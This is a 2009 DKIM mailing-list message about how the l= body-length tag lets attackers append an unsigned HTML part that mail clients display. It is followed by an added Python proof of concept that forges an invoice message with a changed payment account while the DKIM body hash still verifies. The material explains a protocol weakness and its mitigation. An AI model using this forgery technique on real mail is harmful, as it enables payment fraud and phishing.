On Wed, 20 May 2009, Steve Atkins wrote:
> Another use case is to use l= to sign a text part of an email, but not
> to sign an attachment. In that case I can obviously replace the
> attachment with my own content, but depending on the details of the
> email structure I may well be able to replace the text section as
> rendered to the user as well.
Indeed, Outlook will opt to render an HTML part over a text part whenever given the choice. Thus, if you sign only the text/plain portion of a message and an attacker appends a text/html part, the unsigned HTML version will be rendered even if completely different from the text/plain part, and DKIM would give that a thumbs-up.

_______________________________________________
NOTE WELL: This list operates according to
http://mipassoc.org/dkim/ietf-list-rules.html
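The scenario in the two messages above, worked through as an added example (this is not code from the thread or from any DKIM implementation): a signer uses l= to cover a text/plain part but not the attachment that follows it, an attacker keeps the covered bytes intact and replaces everything after them with a text/html part, and a client that prefers HTML shows the attacker's text. Only the bh= body-hash step of DKIM verification is modelled, with the "simple" body canonicalization of RFC 6376 section 3.4.3; the header signature is left out because l= and bh= sit inside the signed DKIM-Signature header and the attacker never touches them. The message bytes, boundary, addresses and the HTML-preferring rendering rule are all constructed assumptions for the example.

```python
"""Constructed demonstration of the DKIM l= (body length) weakness.

Assumptions (not from the original thread): the message, boundary and
addresses are made up; only bh= verification with "simple" body
canonicalization is modelled; `prefer_html=True` stands in for a client
that renders a text/html part in preference to text/plain.
"""
import base64
import hashlib
from email import policy
from email.parser import BytesParser
from typing import Optional

BOUNDARY = b"=_constructed_boundary"

HEADERS = (
    b"From: alice@example.com\r\n"
    b"To: bob@example.net\r\n"
    b"Subject: Invoice\r\n"
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/mixed; boundary="' + BOUNDARY + b'"\r\n'
)


def mime_part(content_type: bytes, body: bytes, extra_headers: bytes = b"") -> bytes:
    """One MIME part preceded by its delimiter line, CRLF line endings throughout."""
    return (b"--" + BOUNDARY + b"\r\n"
            + b"Content-Type: " + content_type + b"\r\n" + extra_headers
            + b"\r\n" + body + b"\r\n")


TEXT_PART = mime_part(b"text/plain; charset=us-ascii",
                      b"Please pay invoice 1234 to account 1111.")
ATTACHMENT_PART = mime_part(b'application/pdf; name="invoice.pdf"',
                            b"%PDF-1.4 constructed placeholder bytes",
                            b'Content-Disposition: attachment; filename="invoice.pdf"\r\n')
CLOSING = b"--" + BOUNDARY + b"--\r\n"

ORIGINAL_BODY = TEXT_PART + ATTACHMENT_PART + CLOSING
# The signer wants to cover the text but not the attachment, so l= is set to
# the length of the canonicalized body up to the end of the text part.
SIGNED_LENGTH = len(TEXT_PART)


def canonicalize_body_simple(body: bytes) -> bytes:
    """'simple' body canonicalization: CRLF lines, trailing empty lines removed."""
    body = body.replace(b"\r\n", b"\n").replace(b"\n", b"\r\n")
    while body.endswith(b"\r\n\r\n"):
        body = body[:-2]
    if not body.endswith(b"\r\n"):
        body += b"\r\n"
    return body


def body_hash(body: bytes, length: Optional[int] = None) -> str:
    """bh= value: base64(SHA-256) over the first `length` canonical octets (all if None)."""
    canon = canonicalize_body_simple(body)
    if length is not None:
        canon = canon[:length]
    return base64.b64encode(hashlib.sha256(canon).digest()).decode("ascii")


def verify_body_hash(raw_message: bytes, expected_bh: str, length: Optional[int]) -> bool:
    """The verifier's bh= check, with bh= and l= taken from the signed DKIM-Signature header."""
    _headers, _sep, body = raw_message.partition(b"\r\n\r\n")
    return body_hash(body, length) == expected_bh


def attacker_rewrite(body: bytes, signed_length: int) -> bytes:
    """Keep the covered prefix byte for byte and replace everything after it."""
    html_part = mime_part(
        b"text/html; charset=us-ascii",
        b"<html><body>Please pay invoice 1234 to account <b>9999</b>.</body></html>")
    return canonicalize_body_simple(body)[:signed_length] + html_part + CLOSING


def rendered_text(raw_message: bytes, prefer_html: bool) -> str:
    """Body part a client would display; prefer_html models the HTML-first behaviour described."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    prefs = ("html", "plain") if prefer_html else ("plain", "html")
    return msg.get_body(preferencelist=prefs).get_content().strip()


ORIGINAL_MESSAGE = HEADERS + b"\r\n" + ORIGINAL_BODY
BH_WITH_L = body_hash(ORIGINAL_BODY, SIGNED_LENGTH)   # published alongside l=
BH_FULL = body_hash(ORIGINAL_BODY)                    # what a signature without l= would carry
FORGED_MESSAGE = HEADERS + b"\r\n" + attacker_rewrite(ORIGINAL_BODY, SIGNED_LENGTH)

if __name__ == "__main__":
    print("l= body hash verifies on forged message:",
          verify_body_hash(FORGED_MESSAGE, BH_WITH_L, SIGNED_LENGTH))
    print("full-body hash verifies on forged message:",
          verify_body_hash(FORGED_MESSAGE, BH_FULL, None))
    print("HTML-preferring client shows:", rendered_text(FORGED_MESSAGE, prefer_html=True))
    print("text-preferring client shows:", rendered_text(FORGED_MESSAGE, prefer_html=False))
```

Everything past the first `l=` octets is outside the hash, so the attacker is free to drop the attachment, add parts, or even change the closing boundary; the only thing fixed is the covered prefix. Dropping l= (hashing the whole canonicalized body) makes the same rewrite fail the bh= check, at the cost of breaking on mailing lists that append footers, which is the trade-off the l= tag was meant to address.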
